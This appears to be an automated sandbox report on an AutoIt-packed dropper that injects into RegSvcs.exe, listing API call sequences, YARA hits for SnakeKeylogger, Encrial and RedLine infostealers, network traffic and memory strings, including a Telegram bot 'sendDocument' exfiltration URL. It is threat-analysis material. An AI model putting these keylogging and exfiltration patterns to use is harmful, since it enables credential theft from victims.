Source: RegSvcs.exe, 00000003.00000002.3598862590.0000000002BD0000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.3599165837.0000000002E60000.00000004.08000000.00040000.00000000.sdmp, RegSvcs.exe, 00000007.00000002.3601164998.00000000044E1000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000007.00000002.3602305553.0000000005AB0000.00000004.08000000.00040000.00000000.sdmp	String found in binary or memory: https://api.telegram.org/bot-/sendDocument?chat_id=
Source: RegSvcs.exe, 00000003.00000002.3599413554.00000000030CE000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000007.00000002.3599294917.00000000035CE000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://reallyfreegeoip.org
Source: RegSvcs.exe, 00000003.00000002.3599413554.00000000030CE000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.3598862590.0000000002BD0000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.3599165837.0000000002E60000.00000004.08000000.00040000.00000000.sdmp, RegSvcs.exe, 00000007.00000002.3601164998.00000000044E1000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000007.00000002.3599294917.00000000035CE000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000007.00000002.3602305553.0000000005AB0000.00000004.08000000.00040000.00000000.sdmp	String found in binary or memory: https://reallyfreegeoip.org/xml/
Source: RegSvcs.exe, 00000003.00000002.3599413554.00000000030CE000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000007.00000002.3599294917.00000000035CE000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://reallyfreegeoip.org/xml/8.46.123.189l

Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49711
Source: unknown	Network traffic detected: HTTP traffic on port 49711 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49715 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49715

Source: C:\Users\user\Desktop\CvzLvta2bG.exe

Code function: 0_2_00E74164 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,_wcscpy,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard,

0_2_00E74164

Source: C:\Users\user\Desktop\CvzLvta2bG.exe	Code function: 0_2_00E74164 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,_wcscpy,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard,		0_2_00E74164
Source: C:\Users\user\AppData\Local\Hymenophyllaceae\definitiveness.exe	Code function: 2_2_00674164 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,_wcscpy,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard,		2_2_00674164

Source: C:\Users\user\Desktop\CvzLvta2bG.exe

Code function: 0_2_00E73F66 OpenClipboard,IsClipboardFormatAvailable,IsClipboardFormatAvailable,GetClipboardData,CloseClipboard,GlobalLock,CloseClipboard,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,DragQueryFileW,DragQueryFileW,DragQueryFileW,GlobalUnlock,CountClipboardFormats,CloseClipboard,

0_2_00E73F66

Source: C:\Users\user\Desktop\CvzLvta2bG.exe

Code function: 0_2_00E6001C GetKeyboardState,SetKeyboardState,GetAsyncKeyState,GetAsyncKeyState,GetKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,

0_2_00E6001C

Source: C:\Users\user\Desktop\CvzLvta2bG.exe	Code function: 0_2_00E8CABC DefDlgProcW,SendMessageW,GetWindowLongW,SendMessageW,SendMessageW,_wcsncpy,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,SendMessageW,SendMessageW,SendMessageW,ImageList_SetDragCursorImage,ImageList_BeginDrag,SetCapture,ClientToScreen,ImageList_DragEnter,InvalidateRect,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,GetWindowLongW,		0_2_00E8CABC
Source: C:\Users\user\AppData\Local\Hymenophyllaceae\definitiveness.exe	Code function: 2_2_0068CABC DefDlgProcW,SendMessageW,GetWindowLongW,SendMessageW,SendMessageW,_wcsncpy,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,SendMessageW,SendMessageW,SendMessageW,ImageList_SetDragCursorImage,ImageList_BeginDrag,SetCapture,ClientToScreen,ImageList_DragEnter,InvalidateRect,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,GetWindowLongW,		2_2_0068CABC

System Summary

Malicious sample detected (through community Yara rule)

Source: 7.2.RegSvcs.exe.5ab0000.5.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 7.2.RegSvcs.exe.5ab0000.5.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 3.2.RegSvcs.exe.2e60000.3.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 3.2.RegSvcs.exe.2e60000.3.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 3.2.RegSvcs.exe.2e60000.3.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 3.2.RegSvcs.exe.2e60000.3.unpack, type: UNPACKEDPE	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 7.2.RegSvcs.exe.44e6560.2.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 7.2.RegSvcs.exe.44e6560.2.unpack, type: UNPACKEDPE	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 7.2.RegSvcs.exe.44e5678.3.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 7.2.RegSvcs.exe.44e5678.3.unpack, type: UNPACKEDPE	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 3.2.RegSvcs.exe.2e60ee8.2.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 3.2.RegSvcs.exe.2e60ee8.2.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 3.2.RegSvcs.exe.2c10b06.0.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 3.2.RegSvcs.exe.2c10b06.0.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 7.2.RegSvcs.exe.5ab0000.5.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 7.2.RegSvcs.exe.5ab0000.5.unpack, type: UNPACKEDPE	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 6.2.definitiveness.exe.1b50000.1.raw.unpack, type: UNPACKEDPE	Matched rule: Detects RedLine infostealer Author: ditekSHen
Source: 7.2.RegSvcs.exe.450e498.4.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 7.2.RegSvcs.exe.450e498.4.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 2.2.definitiveness.exe.10c0000.1.raw.unpack, type: UNPACKEDPE	Matched rule: Detects RedLine infostealer Author: ditekSHen
Source: 3.2.RegSvcs.exe.2c119ee.1.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 3.2.RegSvcs.exe.2c119ee.1.unpack, type: UNPACKEDPE	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 3.2.RegSvcs.exe.2c119ee.1.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 3.2.RegSvcs.exe.2c119ee.1.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 7.2.RegSvcs.exe.44e6560.2.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 7.2.RegSvcs.exe.44e6560.2.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 7.2.RegSvcs.exe.44e5678.3.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 7.2.RegSvcs.exe.44e5678.3.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 7.2.RegSvcs.exe.450e498.4.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 7.2.RegSvcs.exe.450e498.4.unpack, type: UNPACKEDPE	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 3.2.RegSvcs.exe.2e60ee8.2.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 3.2.RegSvcs.exe.2e60ee8.2.unpack, type: UNPACKEDPE	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 3.2.RegSvcs.exe.2c10b06.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 3.2.RegSvcs.exe.2c10b06.0.unpack, type: UNPACKEDPE	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 00000002.00000002.2373788703.00000000010C0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects RedLine infostealer Author: ditekSHen
Source: 00000007.00000002.3601164998.00000000044E1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 00000007.00000002.3602305553.0000000005AB0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 00000007.00000002.3602305553.0000000005AB0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 00000003.00000002.3598862590.0000000002BD0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 00000006.00000002.2490143764.0000000001B50000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects RedLine infostealer Author: ditekSHen
Source: 00000003.00000002.3599165837.0000000002E60000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 00000003.00000002.3599165837.0000000002E60000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: Process Memory Space: RegSvcs.exe PID: 6672, type: MEMORYSTR	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: Process Memory Space: RegSvcs.exe PID: 6900, type: MEMORYSTR	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown

Binary is likely a compiled AutoIt script file

Source: C:\Users\user\Desktop\CvzLvta2bG.exe	Code function: This is a third-party compiled AutoIt script.	0_2_00E03B3A
Source: CvzLvta2bG.exe	String found in binary or memory: This is a third-party compiled AutoIt script.
Source: CvzLvta2bG.exe, 00000000.00000003.2352417210.0000000003C23000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: This is a third-party compiled AutoIt script.	memstr_486fff4c-d
Source: CvzLvta2bG.exe, 00000000.00000003.2352417210.0000000003C23000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: SDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBox\|SHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainer`	memstr_73935fc2-a
Source: CvzLvta2bG.exe, 00000000.00000000.2344717708.0000000000EB4000.00000002.00000001.01000000.00000003.sdmp	String found in binary or memory: This is a third-party compiled AutoIt script.	memstr_86e6a47d-7
Source: CvzLvta2bG.exe, 00000000.00000000.2344717708.0000000000EB4000.00000002.00000001.01000000.00000003.sdmp	String found in binary or memory: SDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBox\|SHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainer`	memstr_eea659d5-2
Source: C:\Users\user\AppData\Local\Hymenophyllaceae\definitiveness.exe	Code function: This is a third-party compiled AutoIt script.	2_2_00603B3A
Source: definitiveness.exe	String found in binary or memory: This is a third-party compiled AutoIt script.
Source: definitiveness.exe, 00000002.00000002.2373376440.00000000006B4000.00000002.00000001.01000000.00000004.sdmp	String found in binary or memory: This is a third-party compiled AutoIt script.	memstr_231affe7-4
Source: definitiveness.exe, 00000002.00000002.2373376440.00000000006B4000.00000002.00000001.01000000.00000004.sdmp	String found in binary or memory: SDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBox\|SHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainer`	memstr_7fc872a2-4
Source: definitiveness.exe, 00000006.00000000.2470375360.00000000006B4000.00000002.00000001.01000000.00000004.sdmp	String found in binary or memory: This is a third-party compiled AutoIt script.	memstr_b25356d5-f
Source: definitiveness.exe, 00000006.00000000.2470375360.00000000006B4000.00000002.00000001.01000000.00000004.sdmp	String found in binary or memory: SDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBox\|SHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainer`	memstr_de975370-b
Source: CvzLvta2bG.exe	String found in binary or memory: This is a third-party compiled AutoIt script.	memstr_e3e6f040-c
Source: CvzLvta2bG.exe	String found in binary or memory: SDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBox\|SHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainer`	memstr_3656e03c-9
Source: definitiveness.exe.0.dr	String found in binary or memory: This is a third-party compiled AutoIt script.	memstr_f6caa3c8-8
Source: definitiveness.exe.0.dr	String found in binary or memory: SDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBox\|SHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainer`	memstr_5bf0fad4-8

Windows Scripting host queries suspicious COM object (likely to drop second stage)

Source: C:\Windows\System32\wscript.exe

COM Object queried: Windows Script Host Shell Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}

Jump to behavior

Source: C:\Users\user\Desktop\CvzLvta2bG.exe

Code function: 0_2_00E6A1EF: GetFullPathNameW,__swprintf,CreateDirectoryW,CreateFileW,_memset,_wcsncpy,DeviceIoControl,CloseHandle,RemoveDirectoryW,CloseHandle,

0_2_00E6A1EF

Source: C:\Users\user\Desktop\CvzLvta2bG.exe

Code function: 0_2_00E58310 _memset,DuplicateTokenEx,CloseHandle,OpenWindowStationW,GetProcessWindowStation,SetProcessWindowStation,OpenDesktopW,_wcscpy,LoadUserProfileW,CreateEnvironmentBlock,CreateProcessAsUserW,UnloadUserProfile,CloseWindowStation,CloseDesktop,SetProcessWindowStation,CloseHandle,DestroyEnvironmentBlock,

0_2_00E58310

Source: C:\Users\user\Desktop\CvzLvta2bG.exe	Code function: 0_2_00E651BD ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState,		0_2_00E651BD
Source: C:\Users\user\AppData\Local\Hymenophyllaceae\definitiveness.exe	Code function: 2_2_006651BD ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState,		2_2_006651BD

Source: C:\Users\user\Desktop\CvzLvta2bG.exe	Code function: 0_2_00E0E6A0	0_2_00E0E6A0
Source: C:\Users\user\Desktop\CvzLvta2bG.exe	Code function: 0_2_00E2D975	0_2_00E2D975
Source: C:\Users\user\Desktop\CvzLvta2bG.exe	Code function: 0_2_00E221C5	0_2_00E221C5
Source: C:\Users\user\Desktop\CvzLvta2bG.exe	Code function: 0_2_00E362D2	0_2_00E362D2
Source: C:\Users\user\Desktop\CvzLvta2bG.exe	Code function: 0_2_00E803DA	0_2_00E803DA
Source: C:\Users\user\Desktop\CvzLvta2bG.exe	Code function: 0_2_00E3242E	0_2_00E3242E
Source: C:\Users\user\Desktop\CvzLvta2bG.exe	Code function: 0_2_00E225FA	0_2_00E225FA
Source: C:\Users\user\Desktop\CvzLvta2bG.exe	Code function: 0_2_00E166E1	0_2_00E166E1
Source: C:\Users\user\Desktop\CvzLvta2bG.exe	Code function: 0_2_00E5E616	0_2_00E5E616
Source: C:\Users\user\Desktop\CvzLvta2bG.exe	Code function: 0_2_00E3878F	0_2_00E3878F
Source: C:\Users\user\Desktop\CvzLvta2bG.exe	Code function: 0_2_00E68889	0_2_00E68889
Source: C:\Users\user\Desktop\CvzLvta2bG.exe	Code function: 0_2_00E36844	0_2_00E36844
Source: C:\Users\user\Desktop\CvzLvta2bG.exe	Code function: 0_2_00E80857	0_2_00E80857
Source: C:\Users\user\Desktop\CvzLvta2bG.exe	Code function: 0_2_00E18808	0_2_00E18808
Source: C:\Users\user\Desktop\CvzLvta2bG.exe	Code function: 0_2_00E2CB21	0_2_00E2CB21
Source: C:\Users\user\Desktop\CvzLvta2bG.exe	Code function: 0_2_00E36DB6	0_2_00E36DB6
Source: C:\Users\user\Desktop\CvzLvta2bG.exe	Code function: 0_2_00E16F9E	0_2_00E16F9E
Source: C:\Users\user\Desktop\CvzLvta2bG.exe	Code function: 0_2_00E13030	0_2_00E13030
Source: C:\Users\user\Desktop\CvzLvta2bG.exe	Code function: 0_2_00E2F1D9	0_2_00E2F1D9
Source: C:\Users\user\Desktop\CvzLvta2bG.exe	Code function: 0_2_00E23187	0_2_00E23187
Source: C:\Users\user\Desktop\CvzLvta2bG.exe	Code function: 0_2_00E01287	0_2_00E01287
Source: C:\Users\user\Desktop\CvzLvta2bG.exe	Code function: 0_2_00E21484	0_2_00E21484
Source: C:\Users\user\Desktop\CvzLvta2bG.exe	Code function: 0_2_00E15520	0_2_00E15520
Source: C:\Users\user\Desktop\CvzLvta2bG.exe	Code function: 0_2_00E27696	0_2_00E27696
Source: C:\Users\user\Desktop\CvzLvta2bG.exe	Code function: 0_2_00E15760	0_2_00E15760
Source: C:\Users\user\Desktop\CvzLvta2bG.exe	Code function: 0_2_00E21978	0_2_00E21978
Source: C:\Users\user\Desktop\CvzLvta2bG.exe	Code function: 0_2_00E39AB5	0_2_00E39AB5
Source: C:\Users\user\Desktop\CvzLvta2bG.exe	Code function: 0_2_00E0FCE0	0_2_00E0FCE0
Source: C:\Users\user\Desktop\CvzLvta2bG.exe	Code function: 0_2_00E87DDB	0_2_00E87DDB
Source: C:\Users\user\Desktop\CvzLvta2bG.exe	Code function: 0_2_00E2BDA6	0_2_00E2BDA6
Source: C:\Users\user\Desktop\CvzLvta2bG.exe	Code function: 0_2_00E21D90	0_2_00E21D90
Source: C:\Users\user\Desktop\CvzLvta2bG.exe	Code function: 0_2_00E13FE0	0_2_00E13FE0
Source: C:\Users\user\Desktop\CvzLvta2bG.exe	Code function: 0_2_00E0DF00	0_2_00E0DF00
Source: C:\Users\user\Desktop\CvzLvta2bG.exe	Code function: 0_2_015804B0	0_2_015804B0
Source: C:\Users\user\AppData\Local\Hymenophyllaceae\definitiveness.exe	Code function: 2_2_0060E6A0	2_2_0060E6A0
Source: C:\Users\user\AppData\Local\Hymenophyllaceae\definitiveness.exe	Code function: 2_2_0062D975	2_2_0062D975
Source: C:\Users\user\AppData\Local\Hymenophyllaceae\definitiveness.exe	Code function: 2_2_006221C5	2_2_006221C5
Source: C:\Users\user\AppData\Local\Hymenophyllaceae\definitiveness.exe	Code function: 2_2_006362D2	2_2_006362D2
Source: C:\Users\user\AppData\Local\Hymenophyllaceae\definitiveness.exe	Code function: 2_2_006803DA	2_2_006803DA
Source: C:\Users\user\AppData\Local\Hymenophyllaceae\definitiveness.exe	Code function: 2_2_0063242E	2_2_0063242E
Source: C:\Users\user\AppData\Local\Hymenophyllaceae\definitiveness.exe	Code function: 2_2_006225FA	2_2_006225FA
Source: C:\Users\user\AppData\Local\Hymenophyllaceae\definitiveness.exe	Code function: 2_2_0065E616	2_2_0065E616
Source: C:\Users\user\AppData\Local\Hymenophyllaceae\definitiveness.exe	Code function: 2_2_006166E1	2_2_006166E1
Source: C:\Users\user\AppData\Local\Hymenophyllaceae\definitiveness.exe	Code function: 2_2_0063878F	2_2_0063878F
Source: C:\Users\user\AppData\Local\Hymenophyllaceae\definitiveness.exe	Code function: 2_2_00636844	2_2_00636844
Source: C:\Users\user\AppData\Local\Hymenophyllaceae\definitiveness.exe	Code function: 2_2_00680857	2_2_00680857
Source: C:\Users\user\AppData\Local\Hymenophyllaceae\definitiveness.exe	Code function: 2_2_00618808	2_2_00618808
Source: C:\Users\user\AppData\Local\Hymenophyllaceae\definitiveness.exe	Code function: 2_2_00668889	2_2_00668889
Source: C:\Users\user\AppData\Local\Hymenophyllaceae\definitiveness.exe	Code function: 2_2_0062CB21	2_2_0062CB21
Source: C:\Users\user\AppData\Local\Hymenophyllaceae\definitiveness.exe	Code function: 2_2_00636DB6	2_2_00636DB6
Source: C:\Users\user\AppData\Local\Hymenophyllaceae\definitiveness.exe	Code function: 2_2_00616F9E	2_2_00616F9E
Source: C:\Users\user\AppData\Local\Hymenophyllaceae\definitiveness.exe	Code function: 2_2_00613030	2_2_00613030
Source: C:\Users\user\AppData\Local\Hymenophyllaceae\definitiveness.exe	Code function: 2_2_0062F1D9	2_2_0062F1D9
Source: C:\Users\user\AppData\Local\Hymenophyllaceae\definitiveness.exe	Code function: 2_2_00623187	2_2_00623187
Source: C:\Users\user\AppData\Local\Hymenophyllaceae\definitiveness.exe	Code function: 2_2_00601287	2_2_00601287
Source: C:\Users\user\AppData\Local\Hymenophyllaceae\definitiveness.exe	Code function: 2_2_00621484	2_2_00621484
Source: C:\Users\user\AppData\Local\Hymenophyllaceae\definitiveness.exe	Code function: 2_2_00615520	2_2_00615520
Source: C:\Users\user\AppData\Local\Hymenophyllaceae\definitiveness.exe	Code function: 2_2_00627696	2_2_00627696
Source: C:\Users\user\AppData\Local\Hymenophyllaceae\definitiveness.exe	Code function: 2_2_00615760	2_2_00615760
Source: C:\Users\user\AppData\Local\Hymenophyllaceae\definitiveness.exe	Code function: 2_2_00621978	2_2_00621978
Source: C:\Users\user\AppData\Local\Hymenophyllaceae\definitiveness.exe	Code function: 2_2_00639AB5	2_2_00639AB5
Source: C:\Users\user\AppData\Local\Hymenophyllaceae\definitiveness.exe	Code function: 2_2_0060FCE0	2_2_0060FCE0
Source: C:\Users\user\AppData\Local\Hymenophyllaceae\definitiveness.exe	Code function: 2_2_00687DDB	2_2_00687DDB
Source: C:\Users\user\AppData\Local\Hymenophyllaceae\definitiveness.exe	Code function: 2_2_0062BDA6	2_2_0062BDA6
Source: C:\Users\user\AppData\Local\Hymenophyllaceae\definitiveness.exe	Code function: 2_2_00621D90	2_2_00621D90
Source: C:\Users\user\AppData\Local\Hymenophyllaceae\definitiveness.exe	Code function: 2_2_0060DF00	2_2_0060DF00
Source: C:\Users\user\AppData\Local\Hymenophyllaceae\definitiveness.exe	Code function: 2_2_00613FE0	2_2_00613FE0
Source: C:\Users\user\AppData\Local\Hymenophyllaceae\definitiveness.exe	Code function: 2_2_01342F30	2_2_01342F30
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 3_2_00408C60	3_2_00408C60
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 3_2_0040DC11	3_2_0040DC11
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 3_2_00407C3F	3_2_00407C3F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 3_2_00418CCC	3_2_00418CCC
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 3_2_00406CA0	3_2_00406CA0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 3_2_004028B0	3_2_004028B0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 3_2_0041A4BE	3_2_0041A4BE
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 3_2_00418244	3_2_00418244
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 3_2_00401650	3_2_00401650
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 3_2_00402F20	3_2_00402F20
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 3_2_00418788	3_2_00418788
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 3_2_00402F89	3_2_00402F89
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 3_2_00402B90	3_2_00402B90
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 3_2_004073A0	3_2_004073A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 3_2_02DA1448	3_2_02DA1448
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 3_2_02DA1437	3_2_02DA1437
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 3_2_02DA1199	3_2_02DA1199
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 3_2_02DA11A8	3_2_02DA11A8
Source: C:\Users\user\AppData\Local\Hymenophyllaceae\definitiveness.exe	Code function: 6_2_014928E8	6_2_014928E8
